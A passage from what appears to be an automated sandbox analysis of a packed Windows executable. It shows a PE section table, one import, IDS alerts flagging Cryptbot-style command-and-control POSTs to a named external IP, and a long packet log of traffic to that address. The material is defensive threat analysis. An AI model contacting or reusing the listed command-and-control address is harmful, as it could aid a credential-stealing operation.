	0x1000	0x617000	0x283e00	6e0ba115ac227baf81e859e24ce133c7	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x618000	0x2b0	0x200	a261e645d6d27ba8db995a76a6ccaa0f	False	0.794921875	data	6.041142644448327	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x619000	0x1000	0x200	e8fbf92e0939d0cd4935f0fe539e974d	False	0.166015625	data	1.1763897754724144	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x61a000	0x38b000	0x200	2511334d9a1598a04f0caa1be36ee590	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
wpxibirw	0x9a5000	0x1b8000	0x1b7a00	70d153ab162f875a18d1083cf0afcfd4	False	0.9940545475547341	data	7.9553234103456045	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
jehzlfbx	0xb5d000	0x1000	0x400	96b2572d78ce5b178fb121e7e45a89d9	False	0.82421875	data	6.358058376520364	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0xb5e000	0x3000	0x2200	5709bde2a0e35edad87883240bcff6fd	False	0.08467371323529412	DOS executable (COM)	1.0370952814408325	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0xb5c600	0x256	ASCII text, with CRLF line terminators			0.5100334448160535

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-19T08:47:46.425400+0100	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.7	49765	194.87.47.113	80	TCP
2024-12-19T08:47:48.611484+0100	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.7	49772	194.87.47.113	80	TCP
2024-12-19T08:47:57.630758+0100	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.7	49804	194.87.47.113	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 19, 2024 08:47:13.558701992 CET	49699	443	192.168.2.7	98.85.100.80
Dec 19, 2024 08:47:13.558731079 CET	443	49699	98.85.100.80	192.168.2.7
Dec 19, 2024 08:47:13.559936047 CET	49699	443	192.168.2.7	98.85.100.80
Dec 19, 2024 08:47:13.577461958 CET	49699	443	192.168.2.7	98.85.100.80
Dec 19, 2024 08:47:13.577476978 CET	443	49699	98.85.100.80	192.168.2.7
Dec 19, 2024 08:47:15.312500000 CET	443	49699	98.85.100.80	192.168.2.7
Dec 19, 2024 08:47:15.320199013 CET	49699	443	192.168.2.7	98.85.100.80
Dec 19, 2024 08:47:15.320225000 CET	443	49699	98.85.100.80	192.168.2.7
Dec 19, 2024 08:47:15.321695089 CET	443	49699	98.85.100.80	192.168.2.7
Dec 19, 2024 08:47:15.321769953 CET	49699	443	192.168.2.7	98.85.100.80
Dec 19, 2024 08:47:15.323544979 CET	49699	443	192.168.2.7	98.85.100.80
Dec 19, 2024 08:47:15.323620081 CET	443	49699	98.85.100.80	192.168.2.7
Dec 19, 2024 08:47:15.340627909 CET	49699	443	192.168.2.7	98.85.100.80
Dec 19, 2024 08:47:15.340636969 CET	443	49699	98.85.100.80	192.168.2.7
Dec 19, 2024 08:47:15.387756109 CET	49699	443	192.168.2.7	98.85.100.80
Dec 19, 2024 08:47:15.661243916 CET	443	49699	98.85.100.80	192.168.2.7
Dec 19, 2024 08:47:15.661403894 CET	443	49699	98.85.100.80	192.168.2.7
Dec 19, 2024 08:47:15.661495924 CET	49699	443	192.168.2.7	98.85.100.80
Dec 19, 2024 08:47:15.671572924 CET	49699	443	192.168.2.7	98.85.100.80
Dec 19, 2024 08:47:15.671591043 CET	443	49699	98.85.100.80	192.168.2.7
Dec 19, 2024 08:47:16.703716040 CET	49700	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:16.823198080 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:16.825588942 CET	49700	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:16.826428890 CET	49700	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:16.947381973 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:16.947453976 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:16.947464943 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:16.947685003 CET	49700	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:16.947824955 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:16.947834969 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:16.947910070 CET	49700	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:16.948123932 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:16.948134899 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:16.948179007 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:16.948187113 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:16.948187113 CET	49700	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:16.948240995 CET	49700	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:16.949522018 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:16.950481892 CET	49700	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:17.067318916 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.067332983 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.067389965 CET	49700	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:17.067392111 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.067397118 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.067439079 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.067462921 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.067481041 CET	49700	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:17.067507982 CET	49700	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:17.067523003 CET	49700	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:17.112951040 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.113058090 CET	49700	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:17.229063034 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.229171991 CET	49700	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:17.276993036 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.392947912 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.395977020 CET	49700	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:17.596975088 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.599642038 CET	49700	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:17.835858107 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.839840889 CET	49700	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:17.839932919 CET	49700	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:17.959773064 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.959789038 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.959794044 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.959892988 CET	49700	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:17.959913969 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.959919930 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.959985018 CET	49700	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:17.960356951 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.960433006 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.960438013 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.960448027 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.960483074 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.960494041 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.960524082 CET	49700	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:17.960545063 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.960546970 CET	49700	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:17.960592985 CET	49700	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:17.960613966 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.960753918 CET	49700	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:17.961074114 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.961122036 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.961132050 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.961188078 CET	49700	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:17.961230993 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.961651087 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.961750984 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.961755037 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.961785078 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.962299109 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.962361097 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.962371111 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.962950945 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.963072062 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.963077068 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.963185072 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.963494062 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.963629961 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.963634014 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.963710070 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:17.965889931 CET	49700	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:18.004897118 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.006151915 CET	49700	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:18.079549074 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.079668999 CET	49700	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:18.079677105 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.079689980 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.079757929 CET	49700	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:18.079843044 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.080077887 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.080178022 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.080189943 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.080317974 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.080399990 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.080482006 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.080598116 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.080750942 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.080761909 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.080791950 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.080878019 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.080986023 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.081130981 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.085526943 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.085568905 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.085578918 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.085644007 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.085705996 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.085716009 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.085755110 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.085937977 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.086013079 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.086024046 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.086034060 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.086045027 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.086054087 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.086155891 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.086165905 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.086244106 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.086255074 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.086323977 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.086334944 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.086359978 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.086427927 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.086498022 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.086507082 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.086560965 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.086633921 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.086741924 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.086751938 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.086770058 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.086848974 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.086895943 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.086905003 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.086909056 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.086994886 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.087044001 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.087054968 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.087065935 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.087136984 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.087146044 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.087178946 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.087270021 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.087280035 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.087289095 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.087380886 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.090454102 CET	49700	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:18.090539932 CET	49700	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:18.125935078 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.199173927 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.199269056 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.199285984 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.199376106 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.199393988 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.199409008 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.199496031 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.199512005 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.199544907 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.199913979 CET	49700	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:18.199995995 CET	49700	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:18.210992098 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.211008072 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.211020947 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.211035013 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.211050034 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.211062908 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.211175919 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.211189985 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.211201906 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.211215019 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.211226940 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.211240053 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.211252928 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.211263895 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.211323977 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.211337090 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.211349010 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.211364031 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.211378098 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.211390972 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.211402893 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.211415052 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.211426973 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.211438894 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.211452961 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.211466074 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.211477995 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.211524963 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.211538076 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.211550951 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.211563110 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.211616993 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.211628914 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.211641073 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.211662054 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.211674929 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.211688042 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.211699963 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.211713076 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.211735010 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.211782932 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.211796045 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.211955070 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.212017059 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.212105036 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.212129116 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.212141991 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.212157011 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.212265968 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.212277889 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.212291002 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.212373018 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.212384939 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.212398052 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.212726116 CET	49700	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:18.212800980 CET	49700	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:18.319669008 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.319685936 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.319792986 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.319900036 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.319989920 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.320054054 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.320286036 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.320298910 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.320470095 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.320547104 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.320569992 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.320693970 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.320708990 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.320732117 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.320867062 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.320880890 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.321038961 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.321242094 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.321324110 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.321418047 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.321475029 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.321594954 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.321609020 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.321640015 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.321700096 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.321712971 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.321787119 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.321917057 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.321929932 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.321959972 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.322086096 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.322098970 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.322328091 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.322340965 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.322352886 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.322412014 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.322423935 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.322436094 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.322571993 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.322585106 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.322690964 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.322704077 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.322715044 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.322931051 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.322943926 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.322957039 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.323069096 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.323081017 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.323092937 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.323105097 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.323174953 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.323187113 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.323332071 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.323344946 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.323760033 CET	49700	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:18.323863983 CET	49700	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:18.332300901 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.332361937 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.332376957 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.332391024 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.332494020 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.332508087 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.332642078 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.332686901 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.332700014 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.332726955 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.332802057 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.332839966 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.332977057 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.333055973 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.333070040 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.333082914 CET	80	49700	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:18.333162069 CET	80	49700	194.87.47.113	192.168.2.7
